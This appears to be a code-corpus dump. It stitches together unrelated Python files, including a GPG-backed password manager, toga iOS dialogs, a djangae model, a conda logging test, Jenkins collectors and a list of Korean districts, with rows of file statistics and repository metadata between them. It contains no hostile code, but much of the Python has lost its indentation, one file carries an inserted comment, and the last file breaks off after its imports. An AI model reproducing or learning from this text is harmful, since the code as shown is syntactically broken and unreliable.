ALPHANUMERIC = CASE_ALPHABET + string.digits
EVERYTHING = ALPHANUMERIC + string.punctuation
def gen_password(choices=ALPHANUMERIC, length=10):
return ''.join(random.choice(choices) for i in range(length))
def requirements_satisfied(requirements, str):
return all([i in str for i in requirements])
def gen_password_require(requirements, choices=ALPHANUMERIC, length=10):
"""
Generate a password containing all the characters in requirements
"""
if len(requirements) > length or not requirements_satisfied(requirements, choices):
raise Exception(
"That's impossible, you can't make a password containing %r with only %r!" % (
requirements, choices))
while True:
pw = gen_password(choices, length)
if requirements_satisfied(requirements, pw):
return pw
def gen_password_entropy(entropy, choices=ALPHANUMERIC):
"""
Generates a password of the desired entropy, calculating the length as
required.
"""
required_length = int(math.ceil(entropy / math.log(len(choices), 2)))
return gen_password(choices=choices, length=required_length)
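# Quick sanity check of the length math above (an illustrative addition, not
# in the original module): 128 bits of entropy over the 62-character
# alphanumeric alphabet requires ceil(128 / log2(62)) = 22 characters.
assert int(math.ceil(128 / math.log(62, 2))) == 22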
def match(needle, haystack):
score = 1
j = 0
last_match = 0
for c in needle:
while j < len(haystack) and haystack[j] != c:
j += 1
if j >= len(haystack):
return 0
score += 1 / (last_match + 1.)
last_match = j
j += 1
return score
def record_score(term, records):
return match(term, records[0] + records[1] + records[3])
def search(term, records):
records = [(record_score(term, i), i) for i in records]
records = list(filter(itemgetter(0), records))
records.sort(key=itemgetter(0), reverse=True)
return [i[1] for i in records]
def is_unique_list(lst):
return len(lst) == len(set(lst))
def disambiguate(records):
choices = [itemgetter(0),
itemgetter(0, 1),
itemgetter(0, 1, 3)]
for choice in choices:
result = list(map(choice, records))
if is_unique_list(result):
return result
# just in case none were unique
return records
class GPGException(Exception):
pass
class IncorrectPasswordException(GPGException):
pass
class InvalidEncryptedFileException(GPGException):
pass
class FileCorruptionException(GPGException):
pass
def gpg_exception_factory(returncode, message):
if returncode == 2:
if b'decryption failed: bad key' in message:
return IncorrectPasswordException(message)
if b'CRC error;' in message:
return FileCorruptionException(message)
if b'fatal: zlib inflate problem: invalid distance' in message:
return FileCorruptionException(message)
if b'decryption failed: invalid packet' in message:
return FileCorruptionException(message)
if b'no valid OpenPGP data found' in message:
return InvalidEncryptedFileException(message)
return Exception("unknown error", returncode, message)
def dencrypt(command, pw, data):
"""
Encrypts or decrypts, by running command
"""
if '\n' in pw:
raise Exception('Newlines not allowed in passwords')
proc = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
proc.stdin.write(force_bytes(pw))
proc.stdin.write(b'\n')
proc.stdin.write(data)
output, erroroutput = proc.communicate()
if proc.returncode != 0:
raise gpg_exception_factory(proc.returncode, erroroutput)
return output
def encrypt(pw, data):
return dencrypt(
['gpg', '-c',
'--passphrase-fd', '0',
'--batch',
'--armor',
'--cipher-algo', 'AES',
'--digest-algo', 'SHA256'],
pw,
data,
)
def decrypt(pw, data):
return dencrypt(
['gpg', '-d', '--passphrase-fd', '0', '--batch'],
pw,
data
)
def get_tmp_file(filename):
file_parts = os.path.split(filename)
return os.path.join(*file_parts[:-1] + ('.' + file_parts[-1].lstrip('.') + '.tmp',))
def get_backup_file(filename):
file_parts = os.path.split(filename)
return os.path.join(*file_parts[:-1] + ('.' + file_parts[-1].lstrip('.') + '.bak',))
@contextmanager
def atomic_replace(filename):
"""
::
with atomic_replace(filename) as f:
f.write('asdf')
with atomic_replace(filename) as f:
f.write('asdf')
raise Exception
# nothing happens to the file
"""
tmpfile_name = get_tmp_file(filename)
fd = os.open(tmpfile_name, os.O_CREAT | os.O_EXCL | os.O_RDWR, 0o600)
try:
f = os.fdopen(fd, "w+b")
yield f
f.flush()
os.fsync(fd) # fdatasync? I don't know
f.seek(0)
new_content = f.read()
if not new_content:
raise Exception("I don't think you want to blank this file...")
try:
with open(filename, 'rb') as current_f:
current_content = current_f.read()
except IOError:
current_content = b''
if current_content != new_content:
with open(get_backup_file(filename), 'w+b') as backup_file:
backup_file.write(current_content)
except:
# If there was an exception, remove the temporary file and reraise
os.unlink(tmpfile_name)
raise
else:
# No exception, rename the temp file over the original
os.rename(tmpfile_name, filename)
finally:
f.close()
def edit_in_editor(current):
EDITOR = os.environ.get('EDITOR', 'vim')
with tempfile.NamedTemporaryFile(mode='w+') as f:
try:
f.write(current)
f.flush()
subprocess.call([EDITOR, f.name])
f.seek(0)
return f.read()
finally:
# don't leave potentially private data lying around
f.write('0' * os.path.getsize(f.name))
f.flush()
def pretty_record(record):
s = '%s@%s' % (record[1], record[0])
if record[3]:
s += ': ' + record[3]
return s
class InteractiveSession(object):
def __init__(self, args, output=sys.stdout, input=sys.stdin, password=None):
self.args = args
self.file = args.file
self.output = output
self.input = input
try:
self.gpg_agent = gpg_agent.GpgAgent()
except KeyError:
self.gpg_agent = None
self.gpg_agent_password_id = 'sdb_m:{file_fingerprint}'.format(
file_fingerprint=hashlib.md5(force_bytes(self.file)).hexdigest()
)
self.password = password
if not self.password:
self.password = self.get_master_password()
def get_master_password(self, error=None):
if self.password:
return self.password
if self.input == sys.stdin:
if self.gpg_agent:
error = error or 'X'
self.password = self.gpg_agent.get_passphrase(
self.gpg_agent_password_id,
prompt='Master password',
error=error
)
else:
if error:
self.output.write('Error: {error}, try again: '.format(error=error))
self.password = getpass()
else:
self.output.write('Password: ')
self.output.flush()
self.password = self.input.readline().rstrip('\n')
return self.password
def clear_master_password(self):
self.password = None
if self.gpg_agent:
self.gpg_agent.clear_passphrase(self.gpg_agent_password_id)
def prompt(self, prompt='', required=True, password=False):
while True:
if password and self.input == sys.stdin:
line = getpass(prompt)
else:
self.output.write(prompt)
self.output.flush()
line = self.input.readline().rstrip('\n')
if not required or line:
return line
def get_record(self, domain=None):
domain = domain or self.prompt('Domain: ')
username = self.prompt('Username: ')
password = self.prompt(
'Password [blank to generate]: ',
required=False,
password=True
) or gen_password_entropy(128)
notes = self.prompt('Notes: ', required=False)
return (domain, username, password, notes)
def edit_record(self, record):
new_record = list(record)
new_record[0] = self.prompt('Name [%s]: ' % record[0], required=False) or record[0]
new_record[1] = self.prompt('Username [%s]: ' % record[1], required=False) or record[1]
pw = self.prompt('Password []/g: ', required=False, password=True) or record[2]
if pw == 'g':
new_record[2] = gen_password_entropy(128)
elif pw:
new_record[2] = pw
self.output.write("Notes: %s\n" % record[3])
edit = self.prompt('Edit? [n]: ', required=False) or 'n'
if edit[0] == 'y':
new_record[3] = edit_in_editor(record[3])
return tuple(new_record)
def find_record(self, query, records):
possibilities = search(query, records)
if len(possibilities) > 1:
choices = disambiguate(possibilities)
for i, choice in enumerate(choices):
self.output.write('%s) %s\n' % (i, choice))
choice = self.prompt('Which did you mean? [0]: ', required=False) or 0
return possibilities[int(choice)]
else:
return possibilities[0]
def read_records(self, error=None):
try:
with open(self.file, 'rb') as f:
password = self.get_master_password(error)
try:
return decode(decrypt(password, f.read()))
except IncorrectPasswordException:
self.clear_master_password()
return self.read_records(error='Incorrect password')
except:
self.clear_master_password()
raise
except IOError:
return []
def add_action(self):
record = self.get_record(self.args.domain or self.prompt('Domain: '))
def add(records):
return records + [record]
self.edit_transaction(add)
def show_action(self, clipboard=10):
record = self.find_record(self.args.domain or self.prompt("Domain: "), self.read_records())
self.output.write(pretty_record(record))
self.output.write("\n")
if clipboard:
try:
self.output.write("username in clipboard\n")
set_clipboard_once(record[1])
self.output.write("password in clipboard\n")
set_clipboard_once(record[2])
except ClipboardException as e:
self.output.write("couldn't set clipboard: %s\n" % e.output.split('\n')[0])
self.output.write(record[2])
self.output.write("\n")
else:
return record[2]
def edit_transaction(self, callback):
with atomic_replace(self.file) as out:
records = callback(self.read_records())
assert isinstance(records, list)
if not is_unique_list(records):
raise Exception("You have two identical records. I don't think you want this.")
out.write(encrypt(self.password, encode(records)))
out.seek(0)
assert records == decode(decrypt(self.password, out.read()))
def edit_action(self):
def edit(records):
record = self.find_record(self.args.domain or self.prompt('Domain: '), records)
new_record = self.edit_record(record)
for i, choice in enumerate(records):
if choice == record:
records[i] = tuple(new_record)
return records
self.edit_transaction(edit)
def delete_action(self):
def delete(records):
record = self.find_record(self.args.domain or self.prompt('Domain: '), records)
self.output.write(pretty_record(record))
self.output.write('\n')
confirm = self.prompt('Really? [n]: ', required=False) or 'n'
if confirm[0] == 'y':
for i, choice in enumerate(records):
if choice == record:
del records[i]
else:
self.output.write("Ok, cancelled\n")
return records
self.edit_transaction(delete)
def raw_action(self):
try:
# PY3
output = self.output.buffer
except AttributeError:
output = self.output
output.write(encode(self.read_records()))
| 31.59633 | 99 | 0.591173 | 1,622 | 13,776 | 4.924168 | 0.200986 | 0.025041 | 0.028171 | 0.011268 | 0.167272 | 0.125078 | 0.108051 | 0.081507 | 0.07675 | 0.056717 | 0 | 0.008577 | 0.297546 | 13,776 | 435 | 100 | 31.668966 | 0.816782 | 0.043844 | 0 | 0.196481 | 0 | 0 | 0.070194 | 0.001835 | 0 | 0 | 0 | 0 | 0.005865 | 1 | 0.108504 | false | 0.155425 | 0.052786 | 0.020528 | 0.293255 | 0.005865 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
44e3de96d18021f8c3b9a4c81b76aeddcd2ffcd2 | 670 | py | Python | gitviper/gitconnector.py | BeayemX/GitViper | 1d6bb8f070d47868e687d879aa30e572ec6cb876 | [
"MIT"
] | 41 | 2017-11-30T19:38:18.000Z | 2021-04-06T21:39:00.000Z | gitviper/gitconnector.py | BeayemX/GitViper | 1d6bb8f070d47868e687d879aa30e572ec6cb876 | [
"MIT"
] | 24 | 2017-11-21T22:56:45.000Z | 2020-11-03T20:16:11.000Z | gitviper/gitconnector.py | BeayemX/GitViper | 1d6bb8f070d47868e687d879aa30e572ec6cb876 | [
"MIT"
] | 6 | 2017-12-13T13:38:48.000Z | 2022-01-05T19:27:01.000Z | import os
from git import InvalidGitRepositoryError, Repo
from gitviper.colors import *
class Connection:
def __init__(self):
self.repo = None
self.working_directory = None
self.is_git_repo = False
connection = Connection()
def connect():
connection.working_directory = os.getcwd()
# TODO gitviper should also work if executed in a subdirectory of a git repository
git_path = os.path.join(connection.working_directory, ".git")
if os.path.isdir(git_path):
connection.repo = Repo(connection.working_directory)
connection.is_git_repo = True
else:
print(RED + "This is not a git repository!" + RESET)
44eeb6a3678576eec5de5e12470d1e6f8be25d51 | 4,570 | py | Python | src/iOS/toga_iOS/dialogs.py | samschott/toga | 400b6935c4689bedb134324b38eb1286af5b5ec6 | [
"BSD-3-Clause"
] | null | null | null | src/iOS/toga_iOS/dialogs.py | samschott/toga | 400b6935c4689bedb134324b38eb1286af5b5ec6 | [
"BSD-3-Clause"
] | null | null | null | src/iOS/toga_iOS/dialogs.py | samschott/toga | 400b6935c4689bedb134324b38eb1286af5b5ec6 | [
"BSD-3-Clause"
] | null | null | null | import asyncio
from rubicon.objc import Block
from rubicon.objc.runtime import objc_id
from toga_iOS.libs import (
UIAlertAction,
UIAlertActionStyle,
UIAlertController,
UIAlertControllerStyle,
)
class BaseDialog:
def __init__(self):
loop = asyncio.get_event_loop()
self.future = loop.create_future()
def __eq__(self, other):
raise RuntimeError(
"Can't check dialog result directly; use await or an on_result handler"
)
def __bool__(self):
raise RuntimeError(
"Can't check dialog result directly; use await or an on_result handler"
)
def __await__(self):
return self.future.__await__()
class AlertDialog(BaseDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__()
self.on_result = on_result
self.dialog = UIAlertController.alertControllerWithTitle(
title, message=message, preferredStyle=UIAlertControllerStyle.Alert
)
self.populate_dialog()
window._impl.controller.presentViewController(
self.dialog,
animated=False,
completion=None,
)
def populate_dialog(self):
pass
def response(self, value):
if self.on_result:
self.on_result(self, value)
self.future.set_result(value)
def null_response(self, action: objc_id) -> None:
self.response(None)
def true_response(self, action: objc_id) -> None:
self.response(True)
def false_response(self, action: objc_id) -> None:
self.response(False)
def add_null_response_button(self, label):
self.dialog.addAction(
UIAlertAction.actionWithTitle(
label,
style=UIAlertActionStyle.Default,
handler=Block(self.null_response, None, objc_id),
)
)
def add_true_response_button(self, label):
self.dialog.addAction(
UIAlertAction.actionWithTitle(
label,
style=UIAlertActionStyle.Default,
handler=Block(self.true_response, None, objc_id),
)
)
def add_false_response_button(self, label):
self.dialog.addAction(
UIAlertAction.actionWithTitle(
label,
style=UIAlertActionStyle.Cancel,
handler=Block(self.false_response, None, objc_id),
)
)
class InfoDialog(AlertDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__(window, title, message, on_result=on_result)
def populate_dialog(self):
self.add_null_response_button("OK")
class QuestionDialog(AlertDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__(window, title, message, on_result=on_result)
def populate_dialog(self):
self.add_true_response_button("Yes")
self.add_false_response_button("No")
class ConfirmDialog(AlertDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__(window, title, message, on_result=on_result)
def populate_dialog(self):
self.add_true_response_button("OK")
self.add_false_response_button("Cancel")
class ErrorDialog(AlertDialog):
def __init__(self, window, title, message, on_result=None):
super().__init__(window, title, message, on_result=on_result)
def populate_dialog(self):
self.add_null_response_button("OK")
class StackTraceDialog(BaseDialog):
def __init__(self, window, title, message, on_result=None, **kwargs):
super().__init__()
window.factory.not_implemented("Window.stack_trace_dialog()")
class SaveFileDialog(BaseDialog):
def __init__(
self,
window,
title,
filename,
initial_directory,
file_types=None,
on_result=None,
):
super().__init__()
window.factory.not_implemented("Window.save_file_dialog()")
class OpenFileDialog(BaseDialog):
def __init__(
self, window, title, initial_directory, file_types, multiselect, on_result=None
):
super().__init__()
window.factory.not_implemented("Window.open_file_dialog()")
class SelectFolderDialog(BaseDialog):
def __init__(self, window, title, initial_directory, multiselect, on_result=None):
super().__init__()
window.factory.not_implemented("Window.select_folder_dialog()")
| 27.69697 | 87 | 0.647046 | 489 | 4,570 | 5.670757 | 0.208589 | 0.066354 | 0.039668 | 0.072124 | 0.632889 | 0.614136 | 0.585287 | 0.570141 | 0.492247 | 0.492247 | 0 | 0 | 0.257112 | 4,570 | 164 | 88 | 27.865854 | 0.816789 | 0 | 0 | 0.341463 | 0 | 0 | 0.057112 | 0.023195 | 0 | 0 | 0 | 0 | 0 | 1 | 0.203252 | false | 0.00813 | 0.03252 | 0.00813 | 0.325203 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44f1ee779a726fff67d92e5ac579e362f94992a0 | 986 | py | Python | djangae/models.py | bocribbz/djangae | 8a118d755cd707e6a452593050c25d790edde944 | [
"BSD-3-Clause"
] | 467 | 2015-01-02T22:35:37.000Z | 2022-02-22T23:13:36.000Z | djangae/models.py | bocribbz/djangae | 8a118d755cd707e6a452593050c25d790edde944 | [
"BSD-3-Clause"
] | 743 | 2015-01-02T15:55:34.000Z | 2021-01-29T09:43:19.000Z | djangae/models.py | bocribbz/djangae | 8a118d755cd707e6a452593050c25d790edde944 | [
"BSD-3-Clause"
] | 154 | 2015-01-01T17:05:59.000Z | 2021-12-09T06:40:07.000Z | from django.db import models
from djangae import patches # noqa
class DeferIterationMarker(models.Model):
"""
Marker to keep track of sharded defer
iteration tasks
"""
# Set to True when all shards have been deferred
is_ready = models.BooleanField(default=False)
shard_count = models.PositiveIntegerField(default=0)
shards_complete = models.PositiveIntegerField(default=0)
delete_on_completion = models.BooleanField(default=True)
created = models.DateTimeField(auto_now_add=True)
callback_name = models.CharField(max_length=100)
finalize_name = models.CharField(max_length=100)
class Meta:
app_label = "djangae"
@property
def is_finished(self):
return self.is_ready and self.shard_count == self.shards_complete
def __unicode__(self):
return "Background Task (%s -> %s) at %s" % (
self.callback_name,
self.finalize_name,
self.created
)
| 26.648649 | 73 | 0.679513 | 117 | 986 | 5.538462 | 0.57265 | 0.021605 | 0.07716 | 0.104938 | 0.095679 | 0.095679 | 0 | 0 | 0 | 0 | 0 | 0.010652 | 0.238337 | 986 | 36 | 74 | 27.388889 | 0.852197 | 0.107505 | 0 | 0 | 0 | 0 | 0.045828 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.095238 | 0.095238 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
44f347e38e371ebb53e0758c63f468672437e9d6 | 694 | py | Python | setup.py | WillBux/Darwin | 7226237283bebff058840dc22132164187d6a1b6 | [
"MIT"
] | 1 | 2018-06-02T20:46:34.000Z | 2018-06-02T20:46:34.000Z | setup.py | WillBux/darwin | 7226237283bebff058840dc22132164187d6a1b6 | [
"MIT"
] | null | null | null | setup.py | WillBux/darwin | 7226237283bebff058840dc22132164187d6a1b6 | [
"MIT"
] | null | null | null | from setuptools import setup
from setuptools import find_packages
setup(name='darwin',
version='0.1',
description='Machine Learning with Genetic Algorithms',
author='Will Buxton',
author_email='will.buxton88@gmail.com',
url='https://github.com/WillBux/darwin',
license='MIT',
install_requires=['tqdm>=4.19.4',
'numpy>=1.13.3',
'pandas>=0.23.4',
'scikit-learn>=0.19.0'],
classifiers=("Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"),
packages=find_packages())
| 36.526316 | 61 | 0.560519 | 74 | 694 | 5.202703 | 0.702703 | 0.072727 | 0.103896 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04321 | 0.299712 | 694 | 18 | 62 | 38.555556 | 0.748971 | 0 | 0 | 0 | 0 | 0 | 0.410663 | 0.033141 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44ff99f1966cb25def6a935cc8e8d094b45ac74a | 1,276 | py | Python | tests/common/test_io.py | astrojuanlu/conda | badf048f5e8287250ef1940249a048f9bde08477 | [
"BSD-3-Clause"
] | 1 | 2017-06-11T01:32:33.000Z | 2017-06-11T01:32:33.000Z | tests/common/test_io.py | astrojuanlu/conda | badf048f5e8287250ef1940249a048f9bde08477 | [
"BSD-3-Clause"
] | null | null | null | tests/common/test_io.py | astrojuanlu/conda | badf048f5e8287250ef1940249a048f9bde08477 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from conda.common.io import attach_stderr_handler, captured
from logging import DEBUG, NOTSET, WARN, getLogger
def test_attach_stderr_handler():
name = 'abbacadabba'
logr = getLogger(name)
assert len(logr.handlers) == 0
assert logr.level is NOTSET
debug_message = "debug message 1329-485"
with captured() as c:
attach_stderr_handler(WARN, name)
logr.warn('test message')
logr.debug(debug_message)
assert len(logr.handlers) == 1
assert logr.handlers[0].name == 'stderr'
assert logr.handlers[0].level is NOTSET
assert logr.level is WARN
assert c.stdout == ''
assert 'test message' in c.stderr
assert debug_message not in c.stderr
# round two, with debug
with captured() as c:
attach_stderr_handler(DEBUG, name)
logr.warn('test message')
logr.debug(debug_message)
logr.info('info message')
assert len(logr.handlers) == 1
assert logr.handlers[0].name == 'stderr'
assert logr.handlers[0].level is NOTSET
assert logr.level is DEBUG
assert c.stdout == ''
assert 'test message' in c.stderr
assert debug_message in c.stderr
| 28.355556 | 82 | 0.679467 | 174 | 1,276 | 4.862069 | 0.275862 | 0.099291 | 0.076832 | 0.089835 | 0.56383 | 0.56383 | 0.56383 | 0.483452 | 0.483452 | 0.387707 | 0 | 0.015106 | 0.221787 | 1,276 | 44 | 83 | 29 | 0.836858 | 0.033699 | 0 | 0.5 | 0 | 0 | 0.085505 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.03125 | false | 0 | 0.09375 | 0 | 0.125 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7802f742be27a766b4db20255b494ac4739dd458 | 1,588 | py | Python | components/collector/src/base_collectors/api_source_collector.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 33 | 2016-01-20T07:35:48.000Z | 2022-03-14T09:20:51.000Z | components/collector/src/base_collectors/api_source_collector.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 2,410 | 2016-01-22T18:13:01.000Z | 2022-03-31T16:57:34.000Z | components/collector/src/base_collectors/api_source_collector.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 21 | 2016-01-16T11:49:23.000Z | 2022-01-14T21:53:22.000Z | """API source collector base classes."""
from abc import ABC
from datetime import datetime
from collector_utilities.type import URL, Response
from model import SourceResponses
from .source_collector import SourceCollector, SourceUpToDatenessCollector
class JenkinsPluginCollector(SourceCollector, ABC): # skipcq: PYL-W0223
"""Base class for Jenkins plugin collectors."""
plugin = "Subclass responsibility"
depth = 0 # Override to pass a higher depth to the plugin API, which means: "please, give me more details"
async def _api_url(self) -> URL:
"""Extend to return the API URL for the plugin, with an optional depth."""
depth = f"?depth={self.depth}" if self.depth > 0 else ""
return URL(f"{await super()._api_url()}/lastSuccessfulBuild/{self.plugin}/api/json{depth}")
async def _landing_url(self, responses: SourceResponses) -> URL:
"""Override to return the URL for the plugin."""
return URL(f"{await super()._api_url()}/lastSuccessfulBuild/{self.plugin}")
class JenkinsPluginSourceUpToDatenessCollector(SourceUpToDatenessCollector):
"""Base class for Jenkins plugin source up-to-dateness collectors."""
async def _api_url(self) -> URL:
"""Extend to return the API URL for the job."""
return URL(f"{await super()._api_url()}/lastSuccessfulBuild/api/json")
async def _parse_source_response_date_time(self, response: Response) -> datetime:
"""Override to parse the job's timestamp."""
return datetime.fromtimestamp(float((await response.json())["timestamp"]) / 1000.0)
| 41.789474 | 111 | 0.714106 | 199 | 1,588 | 5.603015 | 0.361809 | 0.037668 | 0.029596 | 0.040359 | 0.273543 | 0.2287 | 0.2287 | 0.2287 | 0.188341 | 0.188341 | 0 | 0.008378 | 0.173174 | 1,588 | 37 | 112 | 42.918919 | 0.840823 | 0.15995 | 0 | 0.111111 | 0 | 0 | 0.219203 | 0.153986 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.277778 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7803618eb0ae1dc78214daffa6ff69e1281707e9 | 4,854 | py | Python | apps/address/constants.py | ozet-team/ozet-server | 4772d37339634adee6ace65a5e2380df4bd22bbb | [
"MIT"
] | null | null | null | apps/address/constants.py | ozet-team/ozet-server | 4772d37339634adee6ace65a5e2380df4bd22bbb | [
"MIT"
] | 4 | 2021-11-27T14:15:55.000Z | 2021-12-10T12:59:44.000Z | apps/address/constants.py | ozet-team/ozet-server | 4772d37339634adee6ace65a5e2380df4bd22bbb | [
"MIT"
] | null | null | null | class AppConstants:
ADDRESS = {
"서울": [
"강남구",
"강동구",
"강북구",
"강서구",
"관악구",
"광진구",
"구로구",
"금천구",
"노원구",
"도봉구",
"동대문구",
"동작구",
"마포구",
"서대문구",
"서초구",
"성동구",
"성북구",
"송파구",
"양천구",
"영등포구",
"용산구",
"은평구",
"종로구",
"중구",
"중랑구",
],
"부산": [
"강서구",
"금정구",
"기장군",
"남구",
"동구",
"동래구",
"부산진구",
"북구",
"사상구",
"사하구",
"서구",
"수영구",
"연제구",
"영도구",
"중구",
"해운대구",
],
"대구": ["남구", "달서구", "달성군", "동구", "북구", "서구", "수성구", "중구"],
"인천": ["강화군", "계양구", "남동구", "동구", "미추홀구", "부평구", "서구", "연수구", "옹진군", "중구"],
"광주": ["광산구", "남구", "동구", "북구", "서구"],
"대전": ["대덕구", "동구", "서구", "유성구", "중구"],
"울산": ["남구", "동구", "북구", "울주군", "중구"],
"세종": [],
"경기": [
"가평군",
"고양시 덕양구",
"고양시 일산동구",
"고양시 일산서구",
"과천시",
"광명시",
"광주시",
"구리시",
"군포시",
"김포시",
"남양주시",
"동두천시",
"부천시",
"성남시 분당구",
"성남시 수정구",
"성남시 중원구",
"수원시 권선구",
"수원시 영통구",
"수원시 장안구",
"수원시 팔달구",
"시흥시",
"안산시 단원구",
"안산시 상록구",
"안성시",
"안양시 동안구",
"안양시 만안구",
"양주시",
"양평군",
"여주시",
"연천군",
"오산시",
"용인시 기흥구",
"용인시 수지구",
"용인시 처인구",
"의왕시",
"의정부시",
"이천시",
"파주시",
"평택시",
"포천시",
"하남시",
"화성시",
],
"강원": [
"강릉시",
"고성군",
"동해시",
"삼척시",
"속초시",
"양구군",
"양양군",
"영월군",
"원주시",
"인제군",
"정선군",
"철원군",
"춘천시",
"태백시",
"평창군",
"홍천군",
"화천군",
"횡성군",
],
"충북": [
"괴산군",
"단양군",
"보은군",
"영동군",
"옥천군",
"음성군",
"제천시",
"증평군",
"진천군",
"청주시 상당구",
"청주시 서원구",
"청주시 청원구",
"청주시 흥덕구",
"충주시",
],
"충남": [
"계룡시",
"공주시",
"금산군",
"논산시",
"당진시",
"보령시",
"부여군",
"서산시",
"서천군",
"아산시",
"예산군",
"천안시 동남구",
"천안시 서북구",
"청양군",
"태안군",
"홍성군",
],
"전북": [
"고창군",
"군산시",
"김제시",
"남원시",
"무주군",
"부안군",
"순창군",
"완주군",
"익산시",
"임실군",
"장수군",
"전주시 덕진구",
"전주시 완산구",
"정읍시",
"진안군",
],
"전남": [
"강진군",
"고흥군",
"곡성군",
"광양시",
"구례군",
"나주시",
"담양군",
"목포시",
"무안군",
"보성군",
"순천시",
"신안군",
"여수시",
"영광군",
"영암군",
"완도군",
"장성군",
"장흥군",
"진도군",
"함평군",
"해남군",
"화순군",
],
"경북": [
"경산시",
"경주시",
"고령군",
"구미시",
"군위군",
"김천시",
"문경시",
"봉화군",
"상주시",
"성주군",
"안동시",
"영덕군",
"영양군",
"영주시",
"영천시",
"예천군",
"울릉군",
"울진군",
"의성군",
"청도군",
"청송군",
"칠곡군",
"포항시 남구",
"포항시 북구",
],
"경남": [
"거제시",
"거창군",
"고성군",
"김해시",
"남해군",
"밀양시",
"사천시",
"산청군",
"양산시",
"의령군",
"진주시",
"창녕군",
"창원시 마산합포구",
"창원시 마산회원구",
"창원시 성산구",
"창원시 의창구",
"창원시 진해구",
"통영시",
"하동군",
"함안군",
"함양군",
"합천군",
],
"제주": ["서귀포시", "제주시"],
}
| 19.812245 | 83 | 0.183354 | 301 | 4,854 | 2.956811 | 0.850498 | 0.013483 | 0.013483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.642151 | 4,854 | 244 | 84 | 19.893443 | 0.512378 | 0 | 0 | 0.065574 | 0 | 0 | 0.185002 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.008197 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
780711d65aaf7ad757cd312974c9dcd270340af5 | 6,019 | py | Python | aws-blog-campanile/bin/objectcopy.py | securityscorecard/aws-big-data-blog | 6c726f60c293f26de57469b9332f92a3807423c5 | [
"Apache-2.0"
] | 305 | 2018-03-29T10:45:51.000Z | 2022-03-15T16:01:19.000Z | aws-blog-campanile/bin/objectcopy.py | securityscorecard/aws-big-data-blog | 6c726f60c293f26de57469b9332f92a3807423c5 | [
"Apache-2.0"
] | 14 | 2018-04-26T19:06:35.000Z | 2022-02-26T10:50:19.000Z | aws-blog-campanile/bin/objectcopy.py | securityscorecard/aws-big-data-blog | 6c726f60c293f26de57469b9332f92a3807423c5 | [
"Apache-2.0"
] | 204 | 2018-03-26T23:43:30.000Z | 2022-03-20T17:04:41.000Z | #!/usr/bin/python2.7
import sys
import os
import fileinput
import argparse
import random
import tempfile
import ConfigParser
# -----------------------------------------------------------------------------
# Support for Hadoop Streaming Sandbox Env
# -----------------------------------------------------------------------------
sys.path.append(os.environ.get('PWD'))
os.environ["BOTO_PATH"] = '/etc/boto.cfg:~/.boto:./.boto'
import campanile
import boto
from boto.s3.connection import S3Connection
# -----------------------------------------------------------------------------
# Global
